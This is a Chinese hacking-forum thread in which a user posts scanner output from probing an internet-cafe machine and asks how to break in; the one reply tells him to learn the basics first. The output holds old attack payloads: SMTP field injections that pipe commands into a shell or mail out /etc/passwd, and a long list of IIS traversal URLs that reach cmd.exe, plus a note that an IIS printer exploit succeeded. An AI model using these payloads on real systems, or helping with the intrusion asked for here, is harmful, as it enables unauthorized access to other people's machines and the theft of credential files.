20CN网络安全小组第一代论坛
发表新主题  发表回复

个人资料 | 社区目录 用户登录 | | 论坛搜索 | 常见问题 | 论坛主页
  下一个最老的主题   下一个最新的主题
» 20CN网络安全小组第一代论坛   » 安 全 基 地   » 菜鸟乐园   » 大虾进来啊!(难)

   
作者 标题: 大虾进来啊!(难)
无余
未注册


图标 5  发表于         编辑/删除帖子   引用原文回复  
SMTP检测

支持VRFY
检测 SMTP->192.168.0.1 250 server1 Hello [192.168.0.62]
检测 SMTP->192.168.0.1 检测debug漏洞 500 5.3.3 Unrecognized command
检测 SMTP->192.168.0.1 检测kill漏洞 500 5.3.3 Unrecognized command
检测 SMTP->192.168.0.1 检测wiz漏洞 500 5.3.3 Unrecognized command
检测 SMTP->192.168.0.1 检测rcpt to: /tmp/.rhosts漏洞 503 5.5.2 Need Mail From: first
检测 SMTP->192.168.0.1 检测+ +漏洞 500 5.3.3 Unrecognized command
检测 SMTP->192.168.0.1 检测RSET漏洞 250 2.0.0 Resetting
检测 SMTP->192.168.0.1 检测mail from: |/bin/mail hacker < /etc/passwd漏洞 501 5.5.4 Invalid arguments
检测 SMTP->192.168.0.1 检测RSET漏洞 250 2.0.0 Resetting
检测 SMTP->192.168.0.1 检测mail from: |tail|sh漏洞 250 2.1.0 |tail|sh@server1....Sender OK

--------------------------------------------------------------------------------

弱口令检测

--------------------------------------------------------------------------------

端口检测

25 [smtp]
110 [pop3]
80 [http]
135 [epmap]
139 [netbios-ssn]
443 [https]

--------------------------------------------------------------------------------

CGI/ASP漏洞

192.168.0.1/*.idq
192.168.0.1/*.ida
192.168.0.1/?PageServices
192.168.0.1/_vti_bin/fpcount.exe?Page=default.htm|Image=2|Digits=1
192.168.0.1/_vti_inf.html
192.168.0.1/_vti_bin/shtml.exe
192.168.0.1/_vti_bin/shtml.dll
192.168.0.1/_vti_bin/shtml.dll/nosuch.htm
192.168.0.1/null.htw?CiWebHitsFile=/index.asp%20&CiRestriction=none&CiHiliteType=Full
192.168.0.1/?wp-cs-dump
192.168.0.1/?wp-stop-ver
192.168.0.1/?wp-html-rend
192.168.0.1/?wp-uncheckout
192.168.0.1/?wp-start-ver
192.168.0.1/?wp-usr-prop
192.168.0.1/?wp-ver-diff
192.168.0.1/?wp-verify-link
192.168.0.1/?wp-ver-info
192.168.0.1/_vti_bin/fpcount.exe
192.168.0.1/_vti_bin/shtml.dll/_vti_rpc
192.168.0.1/abczxv.htw
192.168.0.1/blabla.idq
192.168.0.1/scripts/samples/search/author.idq
192.168.0.1/scripts/samples/search/filesize.idq
192.168.0.1/scripts/samples/search/filetime.idq
192.168.0.1/scripts/samples/search/query.idq
192.168.0.1/scripts/samples/search/qsumrhit.htw
192.168.0.1/scripts/samples/search/qfullhit.htw
192.168.0.1/scripts/samples/search/simple.idq
192.168.0.1/scripts/samples/search/queryhit.idq
192.168.0.1/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir%20c:\
192.168.0.1/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
192.168.0.1/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir
192.168.0.1/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
192.168.0.1/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir
192.168.0.1/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir
192.168.0.1/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
192.168.0.1/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
192.168.0.1/scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
192.168.0.1/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
192.168.0.1/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
192.168.0.1/null.htw
192.168.0.1/prxdocs/misc/prxrch.idq


IIS5.0 NULL.printer Exploit ...OK
这是我扫描网吧机子的结果!下面该怎么入侵啊?

IP: 已记录
酷公爵
未注册


图标 6  发表于         编辑/删除帖子   引用原文回复  
你从基础知识学起吧!
IP: 已记录

 
发表新主题  发表回复 关闭主题 突出主题 移动主题 删除主题 下一个最老的主题   下一个最新的主题
 - 适于打印的主题视图
转到:
联系我们 | 20CN网络安全小组

Powered by Infopop Corporation
UBB.classic™ 6.5.0
NetDemon修改版 1.5.0, 20CN网络安全小组 版权所有。